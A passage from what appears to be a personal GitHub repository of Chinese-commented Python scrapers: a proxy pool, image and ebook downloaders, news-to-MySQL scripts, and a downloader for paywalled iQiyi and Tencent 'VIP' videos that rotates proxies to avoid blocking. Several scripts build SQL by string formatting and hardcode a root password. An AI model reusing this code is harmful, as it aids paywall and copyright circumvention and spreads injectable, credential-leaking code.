requests.get(self.BAIDU_URL, 83 | proxies=proxy, 84 | headers=userAgent.UserAgent().getRandomHeaders(), 85 | timeout=10) 86 | if req.status_code != 200: 87 | ipPool.remove(ip) 88 | return ipPool 89 | except Exception as e: 90 | logging.error("重新验证IP池异常!", e) 91 | traceback.format_exc(e) 92 | 93 | def writeIpToFile(self): 94 | """ 95 | IP写入文件 96 | :return: 97 | """ 98 | try: 99 | with open("ipPool.txt", "a+", encoding="utf-8") as f: 100 | f.write(str(self.getIpPool())) 101 | logging.info("写入IP {} 个结束!".format(len(self.getIpPool()))) 102 | except Exception as e: 103 | logging.error("IP写入文件异常!", e) 104 | traceback.format_exc(e) 105 | 106 | def getNumIpFromFile(self, num): 107 | """ 108 | 从文件中读入IP 109 | :return: 110 | """ 111 | try: 112 | with open("ipPool.txt", "r", encoding="utf-8") as f: 113 | content = f.read() 114 | contList = content.split("', '") 115 | ipList = contList[1:len(contList) - 1] 116 | randomIpList = random.sample(ipList, num) 117 | return randomIpList 118 | 119 | except Exception as e: 120 | logging.error("IP写入文件异常!", e) 121 | traceback.format_exc(e) 122 | pass 123 | 124 | 125 | if __name__ == '__main__': 126 | # RandomIp().writeIpToFile() 127 | 128 | print(RandomIp().getNumIpFromFile(num=3)) 129 | 130 | # logging.info(len(ipPool)) 131 | # logging.info("ipPool is:" + str(ipPool)) 132 | -------------------------------------------------------------------------------- /spider/configure/test.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 6 | -------------------------------------- 7 | @File : test.py 8 | @Time : 2019/3/3 10:00 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from bs4 import BeautifulSoup as bs 18 | req = requests.get("https://www.xicidaili.com/nn/") 19 | headers = { 20 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.101 Safari/537.36'} 21 | urls = ["https://www.xicidaili.com/nn/1"] 22 | # 获取ip加入到队列 23 | def get_ips(): 24 | pool = [] 25 | 26 | for url in urls: 27 | res = requests.get(url,headers=headers) 28 | # print(res.text) 29 | soup = bs(res.text, "lxml") 30 | ips = soup.find_all("tr") 31 | for i in range(1, len(ips) - 50): 32 | ip = ips[i] 33 | tds = ip.find_all("td") 34 | ip_temp = str(tds[5].contents[0]).lower() + "://" + tds[1].contents[0] + ":" + tds[2].contents[ 35 | 0] 36 | speed = float(tds[6].div.get("title")[:-1]) 37 | connectTime = float(str(tds[7].div.get("title"))[:-1]) 38 | print(speed) 39 | if speed < 0.5 and connectTime < 0.5: 40 | pool.append(ip_temp) 41 | return pool 42 | 43 | def get_ip(): 44 | pool = [] 45 | 46 | for url in urls: 47 | res = requests.get(url,headers=headers) 48 | # print(res.text) 49 | soup = bs(res.text, "lxml") 50 | ips = soup.find_all("tr") 51 | for i in range(1, len(ips) - 50): 52 | ip = ips[i] 53 | tds = ip.find_all("td") 54 | ip_temp = str(tds[5].contents[0]).lower() + "://" + tds[1].contents[0] + ":" + tds[2].contents[ 55 | 0] 56 | pool.append(ip_temp) 57 | return pool 58 | 59 | print(get_ips()) 60 | # import configure.userAgent as userAgent 61 | # print(userAgent.UserAgent().getRandomHeaders()) -------------------------------------------------------------------------------- /spider/coroutine.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/python3 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @File : coroutine.py 6 | @Time : 2018/8/28 21:18 7 | @Software : PyCharm 8 | -------------------------------------- 9 | @Description : 异步协程提高爬速 10 | -------------------------------------- 11 | @Author : lixj 12 | @Email : lixj_zj@163.com 13 | 14 | """ 15 | 16 | """ 17 | ## 1. 引入包asyncio 18 | import asyncio 19 | import requests 20 | 21 | ## 2. 自定义方法 22 | async def request(): 23 | url = "https://www.baidu.com" 24 | status = requests.get(url) 25 | return status 26 | 27 | ## 3. 调用方法返回协程对象 28 | coroutine = request() 29 | 30 | ## 4. 将协程对象封装成task对象(显式声明) 31 | task = asyncio.ensure_future(coroutine) 32 | print(task) 33 | 34 | ## 5. 创建事件循环loop,将协程注册到事件循环中启动 35 | loop = asyncio.get_event_loop() 36 | 37 | loop.run_until_complete(task) 38 | print("task", task) 39 | print("task result:", task.result()) 40 | """ 41 | 42 | ## 1. 引入包asyncio 43 | import asyncio 44 | import time 45 | import aiohttp 46 | from lxml import etree 47 | 48 | ## 2. 自定义方法 49 | async def getContent(url): 50 | # !unclosed client session 错误;The client session supports the context manager protocol for self closing. 51 | # 此写法不需要session.close() 方法关闭session 52 | async with aiohttp.ClientSession() as session: 53 | response = await session.get(url) # requests换成session 54 | result = await response.text() 55 | struct = etree.HTML(result) 56 | content = struct.xpath("/html/body/div[1]/div[3]/ul/li[1]/div[4]/p/text()") 57 | return content 58 | 59 | ## 3. 调用自定义方法返回协程对象 60 | async def request(url): 61 | result = await getContent(url) 62 | print(result) 63 | 64 | # 创建事件循环loop 65 | def even_loop(url_list): 66 | ## 4. 将协程对象再封装一层封装成task对象(显式声明) 67 | tasks = [asyncio.ensure_future(request(url)) for url in url_list] 68 | 69 | ## 5. 创建事件循环loop,将协程注册到事件循环中启动 70 | loop = asyncio.get_event_loop() 71 | loop.run_until_complete(asyncio.wait(tasks)) 72 | 73 | if __name__ == '__main__': 74 | start = time.time() 75 | # https://www.guancha.cn/society/2018_08_29_470073.shtml 76 | url_list = ["url1", "url2", "..."] 77 | even_loop(url_list) 78 | print("cost time:", time.time()-start) 79 | -------------------------------------------------------------------------------- /spider/down_doc_png.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 下载图片 6 | -------------------------------------- 7 | @File : downDocPng.py 8 | @Time : 2018/10/2 14:08 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | from selenium import webdriver 17 | from lxml import etree 18 | import requests 19 | import time 20 | 21 | 22 | def downOnePng(driver, url, i): 23 | # 获取页面全部内容 24 | driver.get(url) 25 | data = driver.page_source 26 | 27 | struct = etree.HTML(data) 28 | png = struct.xpath("//*[@id='main']/div[3]/div[2]/p/img/@src") 29 | url = "http://m.360docs.net" + png[0] 30 | print(url) 31 | 32 | img = requests.get(url) 33 | with open("C:\\Users\\lenovo\\Desktop\\png\\" + str(i) + ".png", "wb") as f: 34 | f.write(img.content) 35 | time.sleep(2) 36 | 37 | if __name__ == '__main__': 38 | chrome_options = webdriver.ChromeOptions() 39 | chrome_options.add_argument('--headless') 40 | chrome_options.add_argument('--disable-gpu') 41 | 42 | chrome_options.add_argument( 43 | '--user-agent=Mozilla/5.0 (Linux; U; Android 4.0.2; en-us; Galaxy Nexus Build/ICL53F) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30') 44 | driver = webdriver.Chrome(chrome_options=chrome_options, 45 | executable_path="../otherfiles/chromedriver/chromedriver.exe") 46 | 47 | url_base = "http://m.360docs.net/doc/info-eef589567ed5360cba1aa8114431b90d6c85892d" 48 | 49 | for i in range(2, 95): 50 | url = url_base + "-" + str(i) + ".html" 51 | downOnePng(driver, url, i) 52 | 53 | 54 | -------------------------------------------------------------------------------- /spider/down_video/down_film.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 下载VIP视频 6 | -------------------------------------- 7 | @File : downFilm.py 8 | @Time : 2018/8/26 0:28 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | ''' 17 | IPO: 18 | input:.ts文件的url、.ts文件的个数 或者 m3u8文件 19 | process: 20 | 初始化配置参数(IP代理网页数,下载路径,视频名称,请求头部参数) 21 | 获得.ts文件的URI列表(包含文件链接地址及文件个数) 22 | 配置代理IP,选取随机IP地址进行文件下载 23 | 下载.ts文件 24 | 合并转换为MP4格式视频 25 | output:完成的MP4格式的视频 26 | 27 | 关键点: 28 | 1. 网页解析 29 | 2. m3u8解析 30 | 3. 设置动态代理 31 | 4. 调用DOS命令合并文件 32 | 33 | 难点: 34 | 1. 获得m3u8文件 35 | 2. 获取.ts文件的URI与个数 36 | 37 | 重点: 38 | 找到视频的m3u8文件(含有.ts文件的URI和个数) 39 | 40 | 注: 41 | 查看m3u8文件与.ts文件的过程: 42 | 1. 打开视频页面,审查元素。 43 | 2. 采用移动端的方式查看加载过程,即点击页面左上方的手机图标,然后刷新页面。 44 | 3. 查找m3u8文件相关的内容。 45 | 若有,则点击查看headers中的request URL,即可下载m3u8文件。若无,则第四步。 46 | 4. 查找.ts文件加载内容。 47 | 根据.ts文件加载headers中的request URL,可获得URI地址。 48 | 查看所有的.ts文件的个数,可以通过解析网站,采用同样的方法,将视频快进到结束时,查看.ts文件的个数。 49 | 5. 获得m3u8文件或.ts文件的URI与个数任其一,即可下载全部视频。 50 | 51 | 视频解析网站: 52 | VIP视频解析:http://www.vipjiexi.com/ 53 | 无名小站:http://www.wmxz.wang/ 54 | 通用解析方式是: 55 | VIP视频解析: http://www.vipjiexi.com/tong.php?url=[播放地址或视频id] 56 | 无名小站:http://www.wmxz.wang/video.php?url=[播放地址或视频id] 57 | 58 | 视频网站中关于管理m3u8文件各不相同: 59 | 腾讯非VIP视频在前端页面中可以直接查看,下载后直接获取VIP试看部分的.ts文件。若获得全部的.ts文件个数,可以通过视频解析网站,按第四步操作查看。 60 | 爱奇艺在前端页面中需制定特定.ts文件的URI地址,获取URI址与个数。 61 | 62 | ''' 63 | 64 | import requests 65 | from bs4 import BeautifulSoup as bs 66 | import os 67 | import time 68 | import random 69 | import re 70 | import m3u8 71 | import traceback 72 | 73 | 74 | class VideoDownload(): 75 | def __init__(self): 76 | self.pageNum = 3 # IP代理网站页数,一页100个IP 77 | 78 | #################### begin 以下路径地址可更改,具体视频的url地址又具体的视频而定 ################### 79 | 80 | # .ts文件的url,针对爱奇艺视频 81 | self.url = "http://video2.fxsdp.com:8091/81820180315/JAVHD00054/650kb/hls/Vf6Uur2229" 82 | 83 | # m3u8文件的url,针对腾讯视频 84 | self.TC_m3u8_url = "http://apd-983a0da8026d665ba14276af64267b05.v.smtcdns.com/vipts.tc.qq.com/A8_h69zsltM9kkOROl8Vx-l7g4JU8HQSrV-cE6aZ1uSc/SSXffv8zY6OTtSN-TvdRq_1UPxz2DDoymrbx04tr9kXcEXoqsDS-bUQNxi9ECFzDb0FC6fHlwXnBk3aN__auyD4rLuK7i9-Q7eCTkP8XE0qplasm_4UKUsyok_3nkKpoDIBP4GCk6THrBrsOST0EZxSi55wQO5Fh/0310_a0026o0eqrg.321002.ts.m3u8?ver=4" 85 | # .ts文件的url,针对腾讯视频 86 | # 根据此url与m3u8文件中的.ts路径相结合,获取.ts文件下载 87 | # 此url在网页审查元素 -> network -> 加载.ts文件的headers中获得 88 | self.TC_ts_url = "https://apd-983a0da8026d665ba14276af64267b05.v.smtcdns.com/vipts.tc.qq.com/A8_h69zsltM9kkOROl8Vx-l7g4JU8HQSrV-cE6aZ1uSc/SSXffv8zY6OTtSN-TvdRq_1UPxz2DDoymrbx04tr9kXcEXoqsDS-bUQNxi9ECFzDb0FC6fHlwXnBk3aN__auyD4rLuK7i9-Q7eCTkP8XE0qplasm_4UKUsyok_3nkKpoDIBP4GCk6THrBrsOST0EZxSi55wQO5Fh/" 89 | 90 | # 路径名称 “ \\ ”,绝对路径 91 | self.m3u8Path = "E:\\delete\\temp.m3u8" # m3u8文件的暂存路径 92 | self.download_path = "E:\\delete\\DOWN" # .ts文件下载路径 93 | self.final_path = "E:\\delete\\FINAL" # 最终合并视频的路径 94 | self.name = "resultFilmName" # 最终合并视频的名称 95 | 96 | #################### end 以上路径地址可更改,具体视频的url地址又具体的视频而定 ################### 97 | 98 | self.headers = { 99 | 'Connection': 'Keep-Alive', 100 | 'Accept': 'text/html, application/xhtml+xml, */*', 101 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 102 | 'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 103 | } 104 | 105 | # 获得.ts文件的URI信息(针对爱奇艺中的视频,需要手动处理) 106 | def getURIList(self): 107 | uri_list = [] 108 | for i in range(1, 1742): #################################### .ts文件的具体个数可在视频解析网站查看后确定 109 | if i < 10: 110 | uri_list.append(self.url + "00" + str(i) + ".ts") 111 | elif i > 100: 112 | uri_list.append(self.url + str(i) + ".ts") 113 | else: 114 | uri_list.append(self.url + "0" + str(i) + ".ts") 115 | return uri_list 116 | 117 | # 获得m3u8文件并解析(针对腾讯视频,可以直接获取m3u8文件) 118 | def get_m3u8_uri(self): 119 | # 开始获取m3u8文件 120 | m3u8Content = requests.get(self.TC_m3u8_url) 121 | try: 122 | with open(self.m3u8Path, "w") as f: 123 | f.write(m3u8Content.text) 124 | # 开始解析m3u8文件 125 | uri_list = [] 126 | m3u8Cont = open(self.m3u8Path, "r") 127 | for line in m3u8Cont.readlines(): 128 | if ".ts" in line: # 提取出含有.ts的一行,作为HTTP请求尾部 129 | uri_list.append(self.TC_ts_url + line.strip()) 130 | else: 131 | continue 132 | return uri_list 133 | except: 134 | traceback.print_exception 135 | 136 | # 获取代理IP网址 137 | def getIPList(self): 138 | print("获取代理IP...") 139 | url = 'http://www.xicidaili.com/nn/' 140 | ipList = [] 141 | for i in range(self.pageNum): 142 | newurl = url + str(i + 1) # 从第一个页面开始 143 | r = requests.get(newurl, headers=self.headers) 144 | soup = bs(r.text, "html.parser") 145 | ips = soup.find_all("tr") 146 | for i in range(1, len(ips)): # 第0个为头信息获取时出现索引异常,从1开始 147 | ipInfo = ips[i] 148 | tds = ipInfo.find_all("td") 149 | ipList.append(tds[1].string + ":" + tds[2].string) 150 | return ipList 151 | 152 | # 选取随机的IP地址 153 | def getRandomIP(self, ipList): 154 | random_ip = random.choice(ipList) 155 | proxy_ip = "http://" + random_ip 156 | proxies = {"http": proxy_ip} 157 | return proxies 158 | 159 | # 下载 160 | def downloadFilm(self): 161 | print("开始下载...") 162 | start_time = time.time() 163 | os.chdir(self.download_path) # 更改下载文件的执行路径,即在该路径下下载文件 164 | ip_list = self.getIPList() 165 | proxies = self.getRandomIP(ip_list) 166 | 167 | uri_list = self.getURIList() # 爱奇艺视频 168 | # uri_list = self.get_m3u8_uri() # 腾讯视频 169 | print(uri_list[:3]) 170 | 171 | num = 1 # 操作文件的个数 172 | for uri in uri_list[:10]: 173 | if num % 5 == 0: 174 | print("更换代理IP") 175 | proxies = self.getRandomIP(ip_list) 176 | if num % 60 == 0: 177 | print("休眠10s") 178 | time.sleep(10) 179 | try: 180 | resp = requests.get(uri, headers=self.headers, 181 | proxies=proxies) # 存在有些网站不支持代理IP, 去掉proxies设置(proxies = proxies) 182 | except: 183 | traceback.print_exception() 184 | if num < 10: 185 | name = ('clip00%d.ts' % num) 186 | elif num > 100: 187 | name = ('clip%d.ts' % num) 188 | else: 189 | name = ('clip0%d.ts' % num) 190 | with open(name, "wb") as f: 191 | f.write(resp.content) 192 | print("正在下载clip%d" % num) 193 | num = num + 1 194 | print("下载完成!总共耗时 %0.3f min " % float((time.time() - start_time) / 60.0)) 195 | 196 | # 合并 197 | def mergeFilm(self): 198 | mess = input("是否进行电影合并?(y/n)") 199 | if mess == "y": 200 | try: 201 | os.chdir(self.download_path) # 更改合并文件的执行路径,即在该路径下进行DOS命令操作 202 | allFile = '' 203 | for file in os.listdir(self.download_path): 204 | allFile = allFile + "+" + file 205 | allFileName = allFile[1:] 206 | # 合并所有.ts文件名,通过DOS命令进行文件合并 207 | command = "copy /b " + allFileName + " /y %s\%s.mp4" % (self.final_path, self.name) # DOS语法,路径为“\” 208 | os.system(command) 209 | print("合并完成...") 210 | except: 211 | traceback.print_exception() 212 | else: 213 | print("不合并电影,程序退出。") 214 | 215 | 216 | if __name__ == "__main__": 217 | videoDownload = VideoDownload() 218 | videoDownload.downloadFilm() 219 | # videoDownload.mergeFilm() 220 | 221 | -------------------------------------------------------------------------------- /spider/down_video/参考.txt: -------------------------------------------------------------------------------- 1 | python下载视频: 2 | 3 | https://blog.csdn.net/JosephPai/article/details/78897370 4 | 5 | python爬虫设置动态代理: 6 | 7 | https://blog.csdn.net/josephpai/article/details/78896613 8 | 9 | 测试视频网址: 10 | http://www.iqiyi.com/v_19rr7p5oh8.html#vfrm=19-9-0-1 11 | 12 | Python3网络爬虫(八):爱奇艺等主流视频网站的VIP视频破解(在线观看+视频下载) 13 | 14 | https://blog.csdn.net/c406495762/article/details/71334633 15 | 16 | 17 | 爱奇艺好看的电影都有vip?神级程序员教你用Python下载Vip视频! 18 | 19 | http://www.sohu.com/a/209336837_100033985 20 | 21 | 22 | 技术博客: 23 | https://blog.csdn.net/c406495762/article/category/6144934 24 | 25 | 26 | 27 | 28 | Python爬虫:抓取Python教程保存为PDF电子书: 29 | https://blog.csdn.net/JosephPai/article/details/78897562 30 | https://github.com/JosephPai/PythonCrawler-Html2Pdf/blob/master/LiaoPythonCrawler.py 31 | 32 | 33 | 34 | 获得M3U8文件,里面可能包含所有M3U8文件的索引集合, 35 | 对应视频播放时的域名,更改最后的文件名为M3U8的文件名。 36 | 在浏览器中打开含有M3U8文件名的连接,即下载得到该M3U8文件。 37 | 打开该M3U8文件,文件中包含多个.ts文件结尾的视频。 38 | 在域名的最后更改为.ts文件结尾的连接,在浏览器中输入.ts文件结尾的连接,即可下载.ts文件。 39 | 将所有.ts文件结尾的视频合并,即可得到总视频。 40 | 41 | 优酷网站视频直接查看方法: 42 | https://blog.csdn.net/u010025003/article/details/52752246 43 | https://jingyan.baidu.com/album/ff411625ba601d12e5823753.html?picindex=6 44 | https://blog.csdn.net/bonlog/article/details/52268556 45 | https://blog.csdn.net/bonlog/article/details/20628639 46 | https://blog.csdn.net/forfuture3513/article/details/52029153 47 | https://blog.csdn.net/qq_34158598/article/details/75330579 48 | 49 | 50 | 51 | 52 | 西游记之女儿国realAdr: 53 | https://tbm.alicdn.com/vUAdB2SRl6Uwi7hn7WB/itmrRpJrsM0prqSBNVt@@hd-00691.ts 54 | 55 | 56 | -------------------------------------------------------------------------------- /spider/down_video/查看.ts文件.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/down_video/查看.ts文件.png -------------------------------------------------------------------------------- /spider/down_video/查看m3u8文件.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/yaojin-li/Python/080d720fc6248af04b4b20f9988c115f6aff8e81/spider/down_video/查看m3u8文件.png -------------------------------------------------------------------------------- /spider/ebook/down_history_books.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------- 5 | Description : 6 | -------------------------------- 7 | @Time : 2019/10/27 10:57 8 | @File : downHistoryBooks.py 9 | @Software: PyCharm 10 | -------------------------------- 11 | @Author : lixj 12 | @contact : lixj_zj@163.com 13 | """ 14 | 15 | import requests 16 | from lxml import etree 17 | from comConfig import user_agent 18 | import time 19 | 20 | 21 | def get_book_urls(url): 22 | time.sleep(2) 23 | content = requests.get(url=url, headers=user_agent.UserAgent().get_headers()) 24 | return str(content.text) 25 | 26 | 27 | if __name__ == '__main__': 28 | base_url = "http://www.shicimingju.com" 29 | website_url = "http://www.shicimingju.com/book/" 30 | book_urls = get_book_urls(website_url) 31 | 32 | struct = etree.HTML(book_urls) 33 | books_list = struct.xpath('//*[@class="bookmark-list"]/ul/li/h2/a/@href') 34 | books_name = struct.xpath('//*[@class="bookmark-list"]/ul/li/h2/a/text()') 35 | 36 | # 1. 所有书列表 37 | print("共 {} 本。".format(len(books_list))) 38 | 39 | book_dict = dict(zip(books_list, books_name)) 40 | 41 | for url in book_dict.keys(): 42 | name = book_dict.get(url) 43 | with open(name + ".txt", "w", encoding="utf-8") as f: 44 | # 2. 每本书的目录 45 | book_html = get_book_urls(base_url + url) 46 | struct = etree.HTML(book_html) 47 | 48 | # 书的章节数 49 | book_content = struct.xpath('//*[@class="book-mulu"]/ul/li/a/@href') 50 | 51 | for content in book_content[:1]: 52 | # 3. 每一章节的内容 53 | one_book = get_book_urls(base_url + content) 54 | struct = etree.HTML(one_book) 55 | 56 | # 章节名 57 | book_name = struct.xpath('//*/h1/text()') 58 | # 每章内容 59 | book_content = struct.xpath('//*[@class="chapter_content"]/p/text()') 60 | 61 | f.write(str(book_name)) 62 | 63 | for content in book_content: 64 | f.write(content) 65 | -------------------------------------------------------------------------------- /spider/get_heml.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 6 | -------------------------------------- 7 | @File : getURLContent.py 8 | @Time : 2018/8/13 14:25 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | 17 | import requests 18 | from lxml import etree 19 | import random 20 | import time 21 | from selenium import webdriver 22 | from multiprocessing import Pool 23 | import pymysql 24 | 25 | def getHTMLText(url): 26 | driver = webdriver.PhantomJS(executable_path='D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # phantomjs的绝对路径 27 | driver.set_page_load_timeout(1) 28 | time.sleep(1) 29 | driver.get(url) # 获取网页 30 | time.sleep(1) 31 | return driver.page_source 32 | 33 | def getContent(headers, html): 34 | struct = etree.HTML(html) 35 | # title = struct.xpath('/html/body/section/div[1]/h1/text()') 36 | content = struct.xpath('/html/body/section/div[2]/p/text()') 37 | # time = struct.xpath('/html/body/section/div[1]/p/span[2]/text()') 38 | # source = struct.xpath('/html/body/section/div[1]/p/span[1]/text()') 39 | # return title, content, time, source 40 | return content 41 | 42 | # def write2file(title, content, time, source): 43 | # conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 44 | # print(conn) 45 | # cursor = conn.cursor(); 46 | # cursor.execute("SELECT * FROM info") 47 | # data = cursor.fetchone() 48 | # print(data) 49 | # with open("./content.txt", "a+", encoding = "utf-8") as f: 50 | # f.write(''.join(title)) 51 | # f.write('\n') 52 | # f.write(''.join(content)) 53 | # f.write('\n\n') 54 | 55 | 56 | 57 | def write2mysql(num, content): 58 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 59 | cursor = conn.cursor(); 60 | sql = "UPDATE docList SET content = '%s' WHERE news_id = %s" % (content[0], num) 61 | 62 | try: 63 | cursor.execute(sql) 64 | conn.commit() 65 | except: 66 | conn.rollback() 67 | 68 | def run(num): 69 | url = "http://localhost:92/zx/cont.html?id=" + str(num) + "&type=jrtt&flags=null" 70 | html = getHTMLText(url) 71 | content = getContent(headers, html) 72 | write2mysql(str(num), content) 73 | 74 | 75 | def get_news_id(): 76 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 77 | cursor = conn.cursor(); 78 | sql = "SELECT news_id FROM docList" 79 | try: 80 | cursor.execute(sql) 81 | result = cursor.fetchall() 82 | list = [] 83 | for one in result: 84 | list.append(one[0]) 85 | 86 | for newsid in list[:2]: 87 | run(newsid) 88 | 89 | except: 90 | conn.rollback() 91 | 92 | 93 | 94 | 95 | if __name__ == '__main__': 96 | headers = { 97 | 'Connection': 'Keep-Alive', 98 | 'Accept': 'text/html, application/xhtml+xml, */*', 99 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 100 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 101 | } 102 | 103 | get_news_id() 104 | 105 | 106 | 107 | 108 | 109 | # beginNum = 281189000 110 | # endNum = 281189001 111 | # beginTime = time.time() 112 | # 113 | # pool = Pool(4) 114 | # for num in range(beginNum, endNum): 115 | # try: 116 | # pool.map(run, run(num)) 117 | # pool.close() # 关闭进程池,不再接受新的进程 118 | # pool.join() # 主进程阻塞等待子进程的退出 119 | # except: 120 | # pass 121 | # continue 122 | # endTime = time.time() 123 | # usedTime = endTime - beginTime 124 | # print(usedTime) 125 | 126 | 127 | 128 | -------------------------------------------------------------------------------- /spider/get_html_new.py: -------------------------------------------------------------------------------- 1 | # -*- coding: utf-8 -*- 2 | """ 3 | ------------------------------------------------- 4 | File Name: get_html_new 5 | Description: 6 | Author: tebon 7 | Date: 2018/8/13 8 | ------------------------------------------------- 9 | Change Activity: 2018/8/13 10 | ------------------------------------------------- 11 | """ 12 | __author__ = 'tebon' 13 | 14 | 15 | import requests 16 | from lxml import etree 17 | import random 18 | import time 19 | from selenium import webdriver 20 | from multiprocessing import Pool 21 | import pymysql 22 | 23 | def getHTMLText(url): 24 | driver = webdriver.PhantomJS(executable_path='D:\\phantomjs-2.1.1-windows\\bin\\phantomjs') # phantomjs的绝对路径 25 | driver.set_page_load_timeout(1) 26 | time.sleep(1) 27 | driver.get(url) # 获取网页 28 | time.sleep(1) 29 | return driver.page_source 30 | 31 | def getContent(headers, html): 32 | struct = etree.HTML(html) 33 | # title = struct.xpath('/html/body/section/div[1]/h1/text()') 34 | content = struct.xpath('/html/body/section/div[2]/p/text()') 35 | # time = struct.xpath('/html/body/section/div[1]/p/span[2]/text()') 36 | # source = struct.xpath('/html/body/section/div[1]/p/span[1]/text()') 37 | # return title, content, time, source 38 | return content 39 | 40 | # def write2file(title, content, time, source): 41 | # conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 42 | # print(conn) 43 | # cursor = conn.cursor(); 44 | # cursor.execute("SELECT * FROM info") 45 | # data = cursor.fetchone() 46 | # print(data) 47 | # with open("./content.txt", "a+", encoding = "utf-8") as f: 48 | # f.write(''.join(title)) 49 | # f.write('\n') 50 | # f.write(''.join(content)) 51 | # f.write('\n\n') 52 | 53 | 54 | 55 | def write2mysql(num, content): 56 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 57 | cursor = conn.cursor(); 58 | sql = "UPDATE docList SET content = '%s' WHERE news_id = %s" % (content[0], num) 59 | print(sql) 60 | pass 61 | try: 62 | cursor.execute(sql) 63 | conn.commit() 64 | except: 65 | print("error: write to mysql! ") 66 | conn.rollback() 67 | 68 | def run(num): 69 | url = "http://localhost:92/zx/cont.html?id=" + str(num) + "&type=jrtt&flags=null" 70 | html = getHTMLText(url) 71 | content = getContent(headers, html) 72 | write2mysql(str(num), content) 73 | 74 | 75 | def get_news_id(): 76 | conn = pymysql.connect(host="localhost", user='root', password='123456789', database = 'news', charset='utf8') 77 | cursor = conn.cursor(); 78 | sql = "SELECT news_id FROM docList" 79 | try: 80 | cursor.execute(sql) 81 | result = cursor.fetchall() 82 | list = [] 83 | for one in result: 84 | list.append(one[0]) 85 | 86 | for newsid in list[38:39]: 87 | run(newsid) 88 | 89 | except: 90 | print("错误!") 91 | conn.rollback() 92 | 93 | 94 | 95 | 96 | if __name__ == '__main__': 97 | headers = { 98 | 'Connection': 'Keep-Alive', 99 | 'Accept': 'text/html, application/xhtml+xml, */*', 100 | 'Accept-Language': 'en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3', 101 | 'User-Agent':'Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36' 102 | } 103 | 104 | get_news_id() 105 | 106 | 107 | 108 | 109 | 110 | # beginNum = 281189000 111 | # endNum = 281189001 112 | # beginTime = time.time() 113 | # 114 | # pool = Pool(4) 115 | # for num in range(beginNum, endNum): 116 | # try: 117 | # pool.map(run, run(num)) 118 | # pool.close() # 关闭进程池,不再接受新的进程 119 | # pool.join() # 主进程阻塞等待子进程的退出 120 | # except: 121 | # pass 122 | # continue 123 | # endTime = time.time() 124 | # usedTime = endTime - beginTime 125 | # print(usedTime) 126 | 127 | 128 | 129 | -------------------------------------------------------------------------------- /spider/get_meizi_image.py: -------------------------------------------------------------------------------- 1 | """ 2 | !/usr/bin/env python3.6 3 | -*- coding: utf-8 -*- 4 | -------------------------------------- 5 | @Description : 多线程爬取网站图片 6 | -------------------------------------- 7 | @File : getMeiziImage.py 8 | @Time : 2018/8/26 0:23 9 | @Software : PyCharm 10 | -------------------------------------- 11 | @Author : lixj 12 | @Contact : lixj_zj@163.com 13 | -------------------------------------- 14 | """ 15 | 16 | import requests 17 | from bs4 import BeautifulSoup 18 | import os 19 | from multiprocessing import Pool 20 | import sys 21 | from datetime import datetime 22 | import re 23 | import traceback 24 | 25 | headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Referer': 'http://www.mzitu.com'} 26 | Picreferer = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Referer': 'http://i.meizitu.net'} 27 | 28 | 29 | def request(url): 30 | try: 31 | html = requests.get(url, headers=headers) 32 | soup = BeautifulSoup(html.text, "lxml") # beautiful库解析 33 | return soup 34 | except: 35 | print("request请求链接异常!") 36 | traceback.print_exc() 37 | 38 | 39 | def get_MaxPage(href): 40 | try: 41 | html_soup = request(href) 42 | max_span = html_soup.find("div", class_="pagenavi").find_all("span")[-2].get_text() # 